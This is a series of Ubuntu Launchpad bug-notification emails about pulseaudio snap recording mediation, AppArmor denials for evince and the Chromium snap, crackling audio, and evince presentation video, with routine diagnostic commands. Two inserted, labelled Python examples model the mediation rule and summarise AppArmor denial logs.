Attaching test-snapd-pulseaudio and test-snapd-audio-record snaps. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: In Progress Status in pulseaudio source package in Bionic: In Progress Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). 
The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] Since the pulseaudio mediation behavior triggers when the security label starts with 'snap.' it is su For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help 
# ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: + [Impact] + Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. - # Original summary: pulseaudio built with --enable-snappy but 'Enable - Snappy support: no' + To correct this situation but not regress existing behavior, Ubuntu + 19.04's pulseaudio was updated patch to allow playback to all connected + clients (snaps or not), record by classic snaps (see bug 1787324) and + record by strict mode snaps if either the pulseaudio or new-in- + snapd-2.41 audio-record interfaces were connected. With this change, + snapd is in a position to migrate snaps to the new audio-playback and + audio-record interfaces and properly mediate audio recording (see + https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- + deprecation/13418). + + The patch to pulseaudio consists of adding a module, enabling it in + default.pa and then when it is enabled, pulseaudio when faced with a + record operation will, when the connecting process is a snap (ie, its + security label (ie, apparmor label) starts with 'snap.'), query snapd + via its control socket to ask if the snap is classic and if not, whether + the pulseaudio or audio-record interfaces are connected. Adjusting + pulseaudio in the manner does not require coordination with any release + of snapd. It does need a newer version of snapd-glib, which was recently + updated to 1.49 in the last SRU. + + [Test Case] + + Since the pulseaudio mediation behavior triggers when the security label + starts with 'snap.' 
it is su + + For unconfined applications: + $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" + yes + + $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording + ^Cyes + + $ paplay /tmp/out.wav && echo "yes" + yes + + For confined, non-snap applications: + $ sudo apt-get install evince + + $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav + && echo yes + + $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording + ^Cyes + + $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" + yes + + + For classic snaps: + $ sudo snap install test-snapd-classic-confinement --classic + + $ snap run --shell test-snapd-classic-confinement + + $ cat /proc/self/attr/current # verify we are classic confined + snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) + + $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" + yes + + $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording + ^Cyes + + $ paplay /tmp/out.wav && echo "yes" + yes + + For strict snaps with pulseaudio: + $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap + + $ snap connections test-snapd-pulseaudio + Interface Plug Slot Notes + pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - + + $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created + ... + + $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- + pulseaudio/common/ + + $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes + xcb_connection_has_error() returned true + yes + + (note, the xcb_connection_has_error() message is due to the x11 + interface not being connecting which is unrelated to mediation. x11 is + left out to ensure that just audio-playback/audio-record are tested) + + $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass + ... 
+ ^Cyes + + $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes + ... + yes + + + For strict snaps with audio-playback/audio-record: + $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap + + $ snap connections test-snapd-audio-record # record not connected + Interface PlugSlot Notes + audio-playback test-snapd-audio-record:audio-playback :audio-playback - + audio-recordtest-snapd-audio-record:audio-record-- + + $ test-snapd-audio-record.play --help # ensure SNAP dirs are created + ... + + $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- + record/common/ + + $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes + xcb_connection_has_error() returned true + yes + + (note, the xcb_connection_has_error() message is due to the x11 + interface not being connecting which is
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Attachment added: "test-snapd-audio-record_1_amd64.snap" https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1781428/+attachment/5292539/+files/test-snapd-audio-record_1_amd64.snap -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: In Progress Status in pulseaudio source package in Bionic: In Progress Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). 
The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] Since the pulseaudio mediation behavior triggers when the security label starts with 'snap.' it is su For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help 
# ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record--
[Desktop-packages] [Bug 1781428] Re: pulseaudio built with --enable-snappy but 'Enable Snappy support: no'
** Description changed: + + # Original summary: pulseaudio built with --enable-snappy but 'Enable + Snappy support: no' + + # Original description + From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic- amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz: ... dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ... Enable Ubuntu trust store: no Enable Snappy support: no Enable Apparmor: yes - - At this point, the patch should probably be dropped, otherwise applications like chromium, etc will no longer be able to record. + At this point, the patch should probably be dropped, otherwise + applications like chromium, etc will no longer be able to record. 
** Summary changed: - pulseaudio built with --enable-snappy but 'Enable Snappy support: no' + please enable snap mediation support -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Bug description: # Original summary: pulseaudio built with --enable-snappy but 'Enable Snappy support: no' # Original description From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic- amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz: ... dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf ... Enable Ubuntu trust store: no Enable Snappy support: no Enable Apparmor: yes At this point, the patch should probably be dropped, otherwise applications like chromium, etc will no longer be able to record. 
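The record-mediation rule from the bug 1781428 description (snap label check, then classic, then the pulseaudio or audio-record interface) written out as a decision function. This is an added example, not the pulseaudio module's code: the real module is C and asks snapd over its control socket through snapd-glib, whereas here the snapd answers are passed in as text. All function and type names are hypothetical, the sample labels and tables are constructed, and refusing an unknown or malformed snap label is an assumption.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Set

# Interfaces that let a strict snap record, per the bug description.
RECORD_INTERFACES = {"pulseaudio", "audio-record"}


@dataclass
class SnapInfo:
    """Stand-in for the answers the module gets from snapd (hypothetical type)."""
    classic: bool
    connections: str  # text laid out like `snap connections <snap>` output


def snap_name_from_label(label: str) -> Optional[str]:
    """Return the snap name for a 'snap.<snap>.<app>' label, None for non-snaps.

    A label that starts with 'snap.' but lacks a snap or app part yields ''
    so the caller can refuse it instead of treating it as unmediated.
    """
    profile = label.strip().split(" ", 1)[0]  # drop ' (enforce)' / ' (complain)'
    if not profile.startswith("snap."):
        return None
    parts = profile.split(".")
    if len(parts) < 3 or not parts[1] or not parts[2]:
        return ""
    return parts[1]


def connected_interfaces(connections: str) -> Set[str]:
    """Interfaces whose plug has a slot attached ('-' in Slot means unconnected)."""
    found = set()
    for line in connections.strip().splitlines()[1:]:  # first line is the header
        fields = line.split()
        if len(fields) >= 3 and fields[2] != "-":
            found.add(fields[0])
    return found


def may_record(label: str, snapd: Dict[str, SnapInfo]) -> bool:
    """Apply the rule: non-snaps and classic snaps record; strict snaps need
    the pulseaudio or audio-record interface connected."""
    snap = snap_name_from_label(label)
    if snap is None:
        return True  # unconfined or non-snap profile: this rule does not apply
    info = snapd.get(snap)
    if info is None:
        return False  # assumption: unknown or malformed snap label is refused
    if info.classic:
        return True
    return bool(RECORD_INTERFACES & connected_interfaces(info.connections))


# Constructed sample data, modelled on the tables in the test case.
PULSEAUDIO_CONNS = """\
Interface   Plug                              Slot         Notes
pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -
"""
RECORD_UNCONNECTED = """\
Interface       Plug                                    Slot             Notes
audio-playback  test-snapd-audio-record:audio-playback  :audio-playback  -
audio-record    test-snapd-audio-record:audio-record    -                -
"""
RECORD_CONNECTED = """\
Interface       Plug                                    Slot             Notes
audio-playback  test-snapd-audio-record:audio-playback  :audio-playback  -
audio-record    test-snapd-audio-record:audio-record    :audio-record    -
"""
SAMPLE_SNAPD = {
    "test-snapd-classic-confinement": SnapInfo(True, "Interface Plug Slot Notes\n"),
    "test-snapd-pulseaudio": SnapInfo(False, PULSEAUDIO_CONNS),
    "test-snapd-audio-record": SnapInfo(False, RECORD_UNCONNECTED),
}
SAMPLE_LABELS = [
    "unconfined",
    "/usr/bin/evince (enforce)",
    "snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)",
    "snap.test-snapd-pulseaudio.record (enforce)",
    "snap.test-snapd-audio-record.record (enforce)",
]


def record_matrix() -> Dict[str, bool]:
    """Decision for each constructed label, mirroring the test-case sections."""
    return {label: may_record(label, SAMPLE_SNAPD) for label in SAMPLE_LABELS}


if __name__ == "__main__":
    for label, allowed in record_matrix().items():
        print(f"{'allow' if allowed else 'deny ':5}  {label}")
```
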
[Desktop-packages] [Bug 301755] Re: Crackling noise after update to pulseaudio
Sorry for bringing up an old post but I had problems similar to what was described here. I was able to "fix" the crackling audio issues using the following lines in daemon.pa:

  high-priority = yes
  nice-level = -11
  realtime-scheduling = yes
  default-fragments = 8
  default-fragment-size-msec = 10

Note that this instance of PulseAudio was not running on an Ubuntu machine but on an OpenWRT based router (BT HomeHub 5) which is used as a sink for an Ubuntu based machine - however since this post came high in the list of search results when I searched the crackling audio issue, there is a possibility that my addition may help somebody.

https://bugs.launchpad.net/bugs/301755

Title:
  Crackling noise after update to pulseaudio

Status in pulseaudio package in Ubuntu:
  Fix Released

Bug description:
  Binary package hint: pulseaudio

  After upgrading to Jaunty, when listening to audio through Pulseaudio, I get a crackling sound, that seems to be bound to system load. Not necessarily CPU load, the CPU load is well below 50% at all times, but I.E. harddisk access seems to provoke the crackling extra.

  When disabling Pulseaudio, running directly towards ALSA, the crackling disappears.

  My soundcard according to lspci: nVidia Corporation CK804 AC'97 Audio Controller (rev a2). (Motherboard built-in)
[Desktop-packages] [Bug 1834386] Re: Ebooks thumbnails fail in Nemo over SMB
(nemo:31811): CinnamonDesktop-WARNING **: 01:08:30.200: Error creating thumbnail for smb://akem-hp.local/comics_bds_mangas/Scrooge/Uncle%20Scrooge%20(001-100)%20GetComics.INFO/029%20Uncle%20Scrooge.cbr: Unrecognized image file format

This suggests that the problem is not due to the apparmor profile (it happens before the denial).

Is the thumbnail correctly generated if you do:

  sudo apparmor_parser -R /etc/apparmor.d/usr.bin.evince

(this unloads the policy from the kernel).

** Changed in: evince (Ubuntu)
       Status: New => Incomplete

** Tags added: apparmor

https://bugs.launchpad.net/bugs/1834386

Title:
  Ebooks thumbnails fail in Nemo over SMB

Status in evince package in Ubuntu:
  Incomplete

Bug description:
  Nemo is unable to generate ebooks thumbnails over SMB share because of evince-thumbnailer apparmor profile (note that Nautilus is able to do it anyway), I removed apparmor to see and it fixed that issue.

  Nemo output when generating thumbs:
  -
  (nemo:31811): CinnamonDesktop-WARNING **: 01:08:30.200: Error creating thumbnail for smb://akem-hp.local/comics_bds_mangas/Scrooge/Uncle%20Scrooge%20(001-100)%20GetComics.INFO/029%20Uncle%20Scrooge.cbr: Unrecognized image file format
  Error loading remote document: An AppArmor policy prevents this sender from sending this message to this recipient; type="method_call", sender=":1.243" (uid=1000 pid=1488 comm="evince-thumbnailer -s 128 smb://akem-hp.local/comi" label="/usr/bin/evince-thumbnailer (enforce)") interface="org.gtk.vfs.MountTracker" member="LookupMount" error name="(unset)" requested_reply="0" destination=":1.10" (uid=1000 pid=1725 comm="/usr/lib/gvfs/gvfsd " label="unconfined")
  (nemo:31811): CinnamonDesktop-WARNING **: 01:08:30.365: Unable to create loader for mime type application/x-cbr: Unrecognized image file format
  -

  Note that it does the same with pdf or some other ebooks format.

  The problem happens in loopback too, just share a folder with ebooks using SMB, flush the thumbnails and open Nemo to that folder via Network (connect to the SMB).

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: evince 3.28.4-0ubuntu1.2
  ProcVersionSignature: Ubuntu 4.18.0-22.23~18.04.1-generic 4.18.20
  Uname: Linux 4.18.0-22-generic x86_64
  NonfreeKernelModules: nvidia_modeset nvidia
  ApportVersion: 2.20.9-0ubuntu7.5
  Architecture: amd64
  Date: Thu Jun 27 02:11:28 2019
  InstallationDate: Installed on 2019-05-31 (26 days ago)
  InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 (20190210)
  SourcePackage: evince
  UpgradeStatus: No upgrade log present (probably fresh install)
[Desktop-packages] [Bug 1828275] Re: [snap] chromium generates a lot of Apparmor noise
You can 'sudo snap connect chromium:mount-observe' for /etc/fstab. /run/mount/utab is more complicated and you can read about it here: https://forum.snapcraft.io/t/namespace-awareness-of-run-mount-utab-and-libmount/5987

For the /run/udev/data accesses, can you paste the output of:

  $ cat /run/udev/data/b230\:*

** Package changed: chromium-browser (Ubuntu) => snapd (Ubuntu)

** Changed in: snapd (Ubuntu)
   Status: New => Incomplete

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1828275

Title: [snap] chromium generates a lot of Apparmor noise

Status in snapd package in Ubuntu: Incomplete

Bug description:
  Running Chromium's snap results in a lot of Apparmor noise like this:

  audit: type=1400 audit(0): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/mount/utab" pid=0 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  audit: type=1400 audit(0): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/udev/data/b230:0" pid=0 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0

  The above and the attached log was collected with:

  journalctl -o cat -k | grep -F ' apparmor="DENIED" ' | grep -F snap.chromium.chromium | sed 's/ audit([0-9.:]\+): / audit(0): /; s/ pid=[0-9]\+ / pid=0 /' | sort

  Additional information:

  $ snap info chromium
  name: chromium
  summary: Chromium web browser, open-source version of Chrome
  publisher: Canonical✓
  contact: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bugs?field.tag=snap
  license: unset
  description: |
    An open-source browser project that aims to build a safer, faster, and more stable way for all Internet users to experience the web.
  commands:
    - chromium.chromedriver
    - chromium
  snap-id: XKEcBqPM06H1Z7zGOdG5fbICuf8NWK5R
  tracking: edge
  refresh-date: 11 days ago, at 12:08 EDT
  channels:
    stable:    74.0.3729.131 2019-05-02 (705) 162MB -
    candidate: 74.0.3729.131 2019-05-01 (705) 162MB -
    beta:      74.0.3729.61 2019-04-06 (688) 162MB -
    edge:      75.0.3770.9 2019-04-27 (703) 163MB -
  installed:   75.0.3770.9 (703) 163MB -

  $ snap interfaces chromium
  Slot                            Plug
  :browser-support                chromium:browser-sandbox
  :camera                         chromium
  :desktop                        chromium
  :gsettings                      chromium
  :home                           chromium
  :network                        chromium
  :network-bind                   chromium
  :opengl                         chromium
  :personal-files                 chromium:chromium-config
  :pulseaudio                     chromium
  :screen-inhibit-control         chromium
  :u2f-devices                    chromium
  :unity7                         chromium
  :upower-observe                 chromium
  :x11                            chromium
  gtk-common-themes:gtk-3-themes  chromium
  gtk-common-themes:icon-themes   chromium
  gtk-common-themes:sound-themes  chromium
  -                               chromium:cups-control
  -                               chromium:mount-observe
  -                               chromium:network-manager
  -                               chromium:password-manager-service
  -                               chromium:removable-media

  $ apt-cache policy snapd
  snapd:
    Installed: 2.38+18.04
    Candidate: 2.38+18.04
    Version table:
   *** 2.38+18.04 500
          500 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       2.37.4+18.04.1 500
          500 http://security.ubuntu.com/ubuntu bionic-security/main amd64 Packages
       2.32.5+18.04 500
          500 http://archive.ubuntu.com/ubuntu bionic/main amd64 Packages

  $ lsb_release -rd
  Description: Ubuntu 18.04.2 LTS
  Release: 18.04

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1828275/+subscriptions
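The journalctl/grep/sed/sort pipeline in the report normalises timestamps and pids so that repeated denials collapse. As an added example (not part of the report or of snapd), the same triage in Python: it parses AppArmor DENIED records, decodes hex-encoded names, and counts them per profile, operation and path. The sample log is constructed, and grouping the /run/udev/data minor numbers is an assumption of this example.

```python
import re
from collections import Counter, defaultdict

# Constructed sample input: the first four lines follow the two denials quoted
# in the report; timestamps, pids, the hex-encoded name and the STATUS line
# are made up for this example.
SAMPLE_LOG = """\
[  101.1] audit: type=1400 audit(1557000001.101:201): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/mount/utab" pid=4100 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[  101.9] audit: type=1400 audit(1557000001.907:202): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/mount/utab" pid=4188 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[  102.3] audit: type=1400 audit(1557000002.300:203): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/udev/data/b230:0" pid=4100 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[  102.4] audit: type=1400 audit(1557000002.410:204): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/udev/data/b230:16" pid=4100 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
[  103.0] audit: type=1400 audit(1557000003.000:205): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name=2F746D702F6120622E706E67 pid=4300 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
[  103.5] audit: type=1400 audit(1557000003.500:206): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.chromium.chromium" pid=4400 comm="apparmor_parser"
"""

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
HEX_RE = re.compile(r'(?:[0-9A-Fa-f]{2})+')
# Assumption of this example: per-device udev database entries such as
# /run/udev/data/b230:0 differ only in the minor number, so they are grouped.
UDEV_RE = re.compile(r'(/run/udev/data/[bc]\d+):\d+')


def parse_denial(line):
    """Return the key=value fields of an AppArmor DENIED record, else None."""
    if 'apparmor="DENIED"' not in line:
        return None
    fields = {}
    for m in FIELD_RE.finditer(line):
        key, quoted, bare = m.groups()
        if quoted is not None:
            fields[key] = quoted
        elif key in ("name", "profile", "comm") and HEX_RE.fullmatch(bare):
            # The audit subsystem writes strings that contain spaces or other
            # unsafe bytes as unquoted hex; decode them back to text.
            fields[key] = bytes.fromhex(bare).decode("utf-8", "replace")
        else:
            fields[key] = bare
    return fields


def generalize(name):
    """Collapse udev per-device entries to one pattern; leave other paths alone."""
    m = UDEV_RE.fullmatch(name)
    return m.group(1) + ":*" if m else name


def summarize(log_text, profile=None):
    """Count denials per (profile, operation, path, denied_mask).

    Returns a list of (key, count, sorted command names), most frequent first.
    """
    counts = Counter()
    comms = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_denial(line)
        if rec is None or (profile and rec.get("profile") != profile):
            continue
        key = (rec.get("profile"), rec.get("operation"),
               generalize(rec.get("name", "")), rec.get("denied_mask"))
        counts[key] += 1
        comms[key].add(rec.get("comm", "?"))
    return [(key, n, sorted(comms[key])) for key, n in counts.most_common()]


if __name__ == "__main__":
    for (prof, op, name, mask), n, who in summarize(SAMPLE_LOG):
        print(f"{n:3d}  {prof}  {op}  {name}  mask={mask}  comm={','.join(who)}")
```
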
[Desktop-packages] [Bug 1826415] Re: Videos do not play in presentation mode
** Tags removed: apparmor

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu.
https://bugs.launchpad.net/bugs/1826415

Title: Videos do not play in presentation mode

Status in Evince: New
Status in evince package in Ubuntu: Triaged

Bug description:
  It is not possible to play embedded videos in the presentation mode. This affects PDF slides created with the beamer/multimedia latex package.

  Initially, no controls are shown on the slide with the video. In the normal mode, video controls appear when the video is clicked with the mouse. However, in the presentation mode, evince goes to the next page when one clicks with the mouse so that the controls do not appear and the video can only be played by exiting the presentation mode.

  Playing videos works fine in presentation mode with the okular PDF-viewer.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: evince 3.28.4-0ubuntu1
